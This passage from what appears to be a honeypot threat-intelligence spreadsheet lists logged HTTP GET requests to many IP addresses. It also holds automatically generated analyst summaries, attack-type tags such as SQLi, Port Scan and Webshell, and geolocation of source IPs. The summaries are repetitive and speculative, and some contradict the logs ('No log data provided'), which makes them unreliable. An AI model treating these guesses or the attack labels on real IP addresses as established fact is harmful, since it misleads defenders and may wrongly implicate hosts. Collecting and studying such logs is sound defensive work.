'/aab8'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/uWW9'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/clAM'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab8'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab9'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/8joK'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/5rrD'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab8'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab9'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '66.94.127.183:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/JVyC'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '66.94.127.183:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab8'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '66.94.127.183:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/jquery-3.3.1.slim.min.js'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '66.94.127.183:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab9'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '66.94.127.183:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/jquery-3.3.2.slim.min.js'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '91.194.11.82:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/Nr4h'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '91.194.11.82:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/1Csv'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '91.194.11.82:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab8'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '91.194.11.82:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab9'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.224.106:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/VLJp'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.224.106:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/XGYe'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/TFjX'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/a5sT'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/fOt3'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/AvOW'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab8'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '94.131.113.33:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/ZGRi'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '94.131.113.33:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/LmOU'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '94.131.113.33:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab8'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '94.131.113.33:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/jquery-3.3.1.slim.min.js'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '94.131.113.33:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab9'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '94.131.113.33:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/jquery-3.3.2.slim.min.js'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/6WWx'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/vTEN'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab8'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab9'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '194.146.12.172:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/bjMC'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '194.146.12.172:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/y3XY'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '194.146.12.172:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab8'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '103.211.202.140:8443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/TQVa'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '103.211.202.140:8443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/L1tl'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '103.211.202.140:8443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab8'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '103.211.202.140:8443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab9'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/u9WW'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/DdRc'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '154.26.156.60:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/GqYK'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '154.26.156.60:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/4Oko'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.209.6:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/xJIQ'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.209.6:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/6wDl'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '5.180.55.39:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/EIjd'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '5.180.55.39:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/eK8u'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '185.74.222.213:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/UKcY'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '185.74.222.213:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/RLKt'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '185.74.222.213:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab9'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '94.131.113.33:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/bZJV'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '94.131.113.33:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/ZEeY'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '185.255.123.181:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/Q7lh'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '185.255.123.181:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/Giy4'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '185.255.123.181:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab8'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '185.255.123.181:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab9'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/yTZ5'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/kDdJ'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab8'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab9'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.224.106:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/vGXG'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.224.106:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/oOIV'}}&amp;</t>
  </si>
  <si>
    <t>::ffff:9499:3856</t>
  </si>
  <si>
    <t>An HTTP GET request was sent to an unusual endpoint on a secure server, potentially indicating reconnaissance or scanning activity by an attacker using a fake user agent. The request is being compressed with gzip, which may be used for data exfiltration. The user agent mimics a legitimate browser but could be a decoy. &amp;&amp; This data suggests a potential malicious GET request to an unknown URI, possibly using gzip compression for obfuscation, originating from an IP address with no known legitimate service on port 443. The User-Agent header is identical to that of a legitimate browser, but this could be an attempt to evade detection. &amp;&amp; An unknown user attempted to access a specific URI on a server, identifying themselves as a Mozilla Firefox browser but with an unusual User-Agent string. This could be a reconnaissance or testing phase of a potential attack. The request was made over a secure connection. &amp;&amp; An attacker is attempting to connect to a secure web server on a specific IP address, potentially trying to exploit vulnerabilities or access sensitive information. The User-Agent header suggests the attack is coming from a simulated browser, possibly indicating a botnet or automated scanning tool. A GET request is being made to an unusual URI path. &amp;&amp; A malicious actor is attempting to access a sensitive resource on the system by sending an HTTPS request with a specific user agent and host header, indicating potential reconnaissance or exploitation activity. The use of gzip encoding suggests the attacker may be trying to compress data for easier transmission or hiding malware. This could be a prelude to a more targeted attack. &amp;&amp; A potential port scanning activity is detected, with the attacker attempting to connect to a service on port 443 of a server with IP address 38.60.224.106 using a browser-like User-Agent for disguise. The connection attempt is made from an unknown source and may be part of a reconnaissance phase before launching further attacks. &amp;&amp; This data indicates a potential malicious GET request to an unknown endpoint, possibly a command and control server, originating from a suspicious IP address, likely attempting to exploit the service for unauthorized purposes. The request is encoded using gzip and sent through HTTPS, suggesting it may be an attempt to bypass security measures. The user agent string appears legitimate but could be spoofed or altered to deceive security systems. &amp;&amp; A GET request was made to a specific URI, potentially attempting to exploit a vulnerability or serve malware, with a suspicious User-Agent and connection setup. The Host header suggests an attempt to connect to a server on a non-standard port. This could be part of a reconnaissance or attack phase. &amp;&amp; A potential web server scanning or enumeration activity has been detected, where a client is attempting to connect to an IP address on port 443 and requesting data from a specific URI in order to identify vulnerabilities. The use of a generic user agent may indicate an automated tool is being used. This could be a reconnaissance effort before launching a more targeted attack. &amp;&amp; This indicates that an attempt was made to connect to the service but did not include any HTTPS protocol information making it likely a reconnaissance or scanning activity attempting to identify available services. The lack of HTTPS protocol information suggests that the attacker is probing for weaknesses. This behavior can be indicative of malicious intent. &amp;&amp; A GET request was sent to a server from an IP address, attempting to access the file or resource located at '/KiRV'. This could be part of a reconnaissance attempt or an exploit of some sort. The User-Agent header is spoofed to match a legitimate browser. &amp;&amp; A potential malicious activity is a GET request to a specific URL, likely attempting to access sensitive information on the target system. The user-agent mimics a legitimate browser, which could be an attempt to evade detection. This may be a reconnaissance probe or a precursor to further attacks. &amp;&amp; A potential malware scanner has scanned the service, likely for vulnerability exploitation. The scanner is using a fake user agent to mimic legitimate traffic. This activity may be reconnaissance or a prelude to further attacks. &amp;&amp; A GET request is being sent to a specific URL on port 443, suggesting an attempt to access a potentially malicious website via HTTPS connection. The user agent and host IP are suspiciously generic. This could be a reconnaissance or phishing activity. &amp;&amp; A GET request is made to an unusual URI path, possibly attempting to access unauthorized data or trigger a malicious response, indicating potential scanning or exploitation activity. The User-Agent header matches the profile of a legitimate browser, suggesting an attempt to blend in with regular traffic. This may be part of a reconnaissance operation. &amp;&amp; An unknown user is attempting to access a web resource located at the specified URI, using a disguised user agent and potentially encrypted data. This could be an attempt to exploit a vulnerability or scan for sensitive information. The request appears to be legitimate but its unusual characteristics raise suspicions. &amp;&amp; No log data provided, unable to analyze. &amp;&amp; An unknown user from IP address 38.54.115.66 accessed a specific URL, possibly attempting to exploit it for malicious purposes. The User-Agent header suggests the activity is likely automated and disguised as a legitimate browser request. This may be an attempt at web scraping or exploiting a vulnerability. &amp;&amp; Possible malicious activity: An unknown host connected to the service and sent a GET request, potentially attempting to access unauthorized content, with some characteristics suggesting it may be automated or scripted. The user agent is a commonly used browser type but could also be spoofed. This might be an initial reconnaissance scan. &amp;&amp; Malicious activity detected, an unknown user from IP address 66.94.127.183 is making a GET request to a specific URI ('/AqFd') on the server's port 443. The User-Agent string is spoofed, indicating possible identity theft or masking of true origin. &amp;&amp; The data suggests a potential scanning activity, as the request appears to be probing for vulnerabilities in an exposed service on a specific IP address. The "gzip" encoding and close connection suggest a brief or automated scan rather than legitimate traffic. The User-Agent is suspiciously generic. &amp;&amp; This log data indicates a potential malicious GET request to an unusual URI, possibly attempting to exploit the service for unauthorized access or data retrieval. The User-Agent header suggests a common web browser but may be spoofed. This could be an attempt to scan for vulnerabilities in the service. &amp;&amp; A GET request is made to a suspicious URL, potentially attempting to exploit or gather information from the system, possibly related to a malware infection. The user agent appears legitimate but may be spoofed. This could be an initial reconnaissance step in a larger attack. &amp;&amp; A user agent with the name "Mozilla/5.0" is making a GET request to an unknown URI "/3Yhh". This could be a probing attempt by a malicious actor testing for vulnerabilities. The use of gzip compression and close connection may indicate further potential malicious activity. &amp;&amp; No data received from HTTP service, likely indicating a scanning or probing attempt by an attacker to identify potential vulnerabilities. The lack of HTTP traffic suggests the attacker is exploring the system's exposed services before launching a targeted attack. This could be a reconnaissance step in a larger malicious operation. &amp;&amp; No HTTP traffic was detected for this log entry, suggesting that an attacker may be using a non-standard service or probing for vulnerabilities. This lack of HTTP activity could indicate a potential scanning or reconnaissance attempt by the malicious actor. The absence of any discernible HTTP requests is unusual and warrants further investigation. &amp;&amp; A GET request is being sent to an unknown endpoint, potentially indicating reconnaissance or a scan of the system's available resources. The user agent and host headers suggest a sophisticated tool is being used. This could be an attacker probing for vulnerabilities. &amp;&amp; A GET request was made to a specific URI on port 443, which is typically used for secure HTTPS connections. The request was likely initiated by a browser with a fake user-agent string, attempting to exploit the system or steal sensitive information. This behavior suggests an attempt at reconnaissance or malicious data retrieval. &amp;&amp; An unknown client from IP address 77.91.74.218 is making a GET request to an unspecified resource. This could be an attempt to access a vulnerable web application. The request appears to come from a Macintosh device with a fake User-Agent string. &amp;&amp; A GET request was made to a specific URI, likely attempting to access a web application, from an IP address with a suspicious user agent string, possibly trying to exploit the system or inject malware. The request includes compressed data and is targeting port 443, which is typically used for secure connections. This could be a reconnaissance attempt or a malicious attack in progress. &amp;&amp; An unknown client is making a GET request to an unvisited URL on a server, likely attempting to exploit a vulnerability or probe for information. The user agent string is a common tactic used by malicious actors to hide their identity. This may be a reconnaissance attempt ahead of potential exploitation. &amp;&amp; An unknown client is making a GET request to an unusual endpoint, using the browser's user agent string, possibly attempting to scan for vulnerabilities or exploit known weaknesses in outdated software versions. The request appears to be from a compromised IP address with a non-standard port being used as the host. This could indicate scanning or reconnaissance activity. &amp;&amp; A malicious client with a fake Mozilla Firefox user agent accessed the server to retrieve data from a possibly exploited service, trying to get data compressed with gzip. The request is made to an unusual URI which may indicate exploitation or vulnerability scanning. &amp;&amp; A possible scanning activity, a malicious user attempting to connect to a specific service on a server at IP address 209.145.61.177 and potentially exploiting a vulnerability, likely using an older version of the Mozilla Firefox browser. 
The request is for a GET method with a specified URI. 
This may be a reconnaissance or probing attempt by an attacker. &amp;&amp; A GET request was made to an unknown URI, possibly exploiting a vulnerability or attempting unauthorized access. The User-Agent string is fake and may be used for obfuscation. This activity could be indicative of reconnaissance or a potential attack vector. &amp;&amp; This data suggests a potential malicious GET request to an unknown endpoint on a server with IP address 156.244.8.69, likely attempting to exploit the system or retrieve sensitive information. The use of gzip encoding and Mozilla/5.0 User-Agent indicates attempted evasion of detection or concealment of true origin. A connection is immediately closed after the request, possibly indicating a scanning activity. &amp;&amp; Possible malicious activity: An encrypted request was made to a server with a suspicious user agent string and URI, potentially indicating unauthorized access to sensitive resources. The connection is being closed immediately after the request, which could be a sign of evasion techniques. The request also includes gzip encoding, which may be used for compressing malware. &amp;&amp; An encrypted GET request was made to a specific host on port 443, likely attempting unauthorized access.
The client is impersonating a browser with an old version of Firefox.
This activity may be reconnaissance or part of a larger malicious operation. &amp;&amp; Malicious activity detected - a GET request to an unusual URI ('/aab8') from a potentially spoofed IP address (156.244.8.69). The User-Agent string appears legitimate but may be faked. This could be a reconnaissance or exploit attempt.</t>
  </si>
  <si>
    <t>SQLi &amp;&amp; Web Scan &amp;&amp; Port Scan &amp;&amp; Web Scanner &amp;&amp; SQL Injection 
(No response yet, waiting for more input...) &amp;&amp; Scan Attempt &amp;&amp; HTTP Scanning &amp;&amp; HTTP Scan &amp;&amp; Denial Scan &amp;&amp; Brute Force &amp;&amp; Web Scanning &amp;&amp; Portscan &amp;&amp; Port Scan &amp;&amp; Port Scan &amp;&amp; Brute Force &amp;&amp; Port Scan &amp;&amp; XSS Brute &amp;&amp; Portscan 
Webshell &amp;&amp; Web Shell &amp;&amp; Scanning Attack &amp;&amp; Web Attack &amp;&amp; Web Scanner</t>
  </si>
  <si>
    <t>207a14ff3ddca0a11fbe81e3e461feb1</t>
  </si>
  <si>
    <t>59.183.27.25</t>
  </si>
  <si>
    <t>MH</t>
  </si>
  <si>
    <t>Maharashtra</t>
  </si>
  <si>
    <t>Mumbai Suburban</t>
  </si>
  <si>
    <t>Mumbai</t>
  </si>
  <si>
    <t>1275339</t>
  </si>
  <si>
    <t>400001</t>
  </si>
  <si>
    <t>19.076</t>
  </si>
  <si>
    <t>72.8777</t>
  </si>
  <si>
    <t>MTNL Mumbai</t>
  </si>
  <si>
    <t>::ffff:3bb7:1b19</t>
  </si>
  <si>
    <t>78b7a16a891fb17a10a9a85977f4158b</t>
  </si>
  <si>
    <t>117.206.188.127</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H7</t>
  </si>
  <si>
    <t>DL</t>
  </si>
  <si>
    <t>Delhi</t>
  </si>
  <si>
    <t>New Delhi</t>
  </si>
  <si>
    <t>New Delhi (Block N)</t>
  </si>
  <si>
    <t>1261481</t>
  </si>
  <si>
    <t>110001</t>
  </si>
  <si>
    <t>28.6309</t>
  </si>
  <si>
    <t>77.2229</t>
  </si>
  <si>
    <t>NIB</t>
  </si>
  <si>
    <t>::ffff:75ce:bc7f</t>
  </si>
  <si>
    <t>7ef24366eefca14b658c2f48d9fdde86</t>
  </si>
  <si>
    <t>195.211.191.55</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:sip']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Session Manipulation&amp;&amp;Credential Stuffing&amp;&amp;Email Spoofing</t>
  </si>
  <si>
    <t>SMA-LAB_SMTP_H45&amp;&amp;SMA-LAB_SMTP_HC1</t>
  </si>
  <si>
